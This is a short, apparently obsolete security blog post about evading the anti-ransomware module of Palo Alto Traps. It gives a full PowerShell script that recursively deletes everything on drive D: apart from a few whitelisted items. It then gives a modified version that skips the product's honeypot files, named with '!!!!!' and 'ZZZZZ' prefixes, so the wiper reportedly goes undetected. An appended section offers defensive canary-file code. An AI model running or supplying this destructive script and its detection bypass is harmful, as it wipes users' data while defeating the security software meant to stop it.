Evading Palo Alto Traps Anti-Ransomware Protection (OBSOLETE)


This piece could be the shortest article you have read or will read today, so don’t blink:

The PoC script below mimics ransomware: it wipes the whole D: drive except some pre-excluded files and folders ($TrustedFiles and $TrustedFolders).
When this script runs, Traps (version 4.1.0 and above, with the Anti-Ransomware module activated) flags it as ransomware and kills the process, because it is performing bulk file/folder modification:

$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}

	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}

}

foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if ($Fil -eq $fileToCheck){
			$deletefile = 0
		}
	}

	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}

}

So how does Traps detect that?
Simply put, it creates honeypot files in every directory, with names like !!!!!2686401769.jpg and ZZZZZ1920832159.png.
Below is the list of all the file names:

So we edit the PoC script to exclude everything that starts with !!!!! or ZZZZZ, and it just works: Traps marks it as a benign process:

$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}

	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}

}

foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if (($Fil -eq $fileToCheck) -or ($fileToCheck -match "^ZZZZZ") -or ($fileToCheck -match "^!!!!!")){
			$deletefile = 0
		}
	}

	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}

}
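The honeypot mechanism described above relies on file names with a fixed prefix, which is exactly what the exclusion keys on. As an added illustration (not Traps’ code, not part of the original post), the script below shows the same canary-file idea implemented so that a prefix filter has nothing to match: every canary gets a random name and an ordinary extension, and the only record of where the canaries live is a manifest stored outside the protected tree. The manifest location under $env:ProgramData and the function names are assumptions of this example.

```powershell
# Added illustration of canary-file detection (not Traps' code): random names
# deny the fixed-prefix exclusion shown above; the manifest lives outside the tree.
function Get-Sha256Hex([string]$Path) {
    $sha = [System.Security.Cryptography.SHA256]::Create()
    try { ([BitConverter]::ToString($sha.ComputeHash([IO.File]::ReadAllBytes($Path)))) -replace '-', '' }
    finally { $sha.Dispose() }
}

function New-CanaryManifest {
    param(
        [Parameter(Mandatory)][string]$Root,
        [string]$ManifestPath = (Join-Path $env:ProgramData 'canary-manifest.json')  # assumed location
    )
    $manifest = @{}
    $dirs = @(Get-Item -LiteralPath $Root) +
            @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        # Random base name plus an ordinary document extension: no prefix to match on
        $name = [IO.Path]::GetRandomFileName() -replace '\.[^.]*$', '.docx'
        $path = Join-Path $dir.FullName $name
        $bytes = New-Object byte[] 4096
        [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
        try {
            [IO.File]::WriteAllBytes($path, $bytes)
            [IO.File]::SetAttributes($path, [IO.FileAttributes]::Hidden)
            $manifest[$path] = Get-Sha256Hex $path
        } catch { Write-Verbose "Skipping $($dir.FullName): $_" }   # e.g. System Volume Information
    }
    $manifest | ConvertTo-Json | Set-Content -LiteralPath $ManifestPath
    return $manifest
}

function Test-CanaryManifest {
    param([string]$ManifestPath = (Join-Path $env:ProgramData 'canary-manifest.json'))
    $manifest = Get-Content -LiteralPath $ManifestPath -Raw | ConvertFrom-Json
    $alerts = @()
    foreach ($entry in $manifest.PSObject.Properties) {
        if (-not (Test-Path -LiteralPath $entry.Name -PathType Leaf)) {
            $alerts += [pscustomobject]@{ Path = $entry.Name; Event = 'Deleted' }
        } elseif ((Get-Sha256Hex $entry.Name) -ne $entry.Value) {
            $alerts += [pscustomobject]@{ Path = $entry.Name; Event = 'Modified' }   # encrypted in place
        }
    }
    return $alerts
}

# Usage: deploy once, then run the check from a scheduled task and alert on any hit
# New-CanaryManifest -Root 'D:\' | Out-Null
# Test-CanaryManifest | ForEach-Object { Write-Warning "Canary $($_.Event): $($_.Path)" }
```

Run Test-CanaryManifest on a short schedule; a single deleted or modified canary is a strong signal of bulk file tampering and is worth an alert on its own.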

Is it that easy or is there something I’m missing?
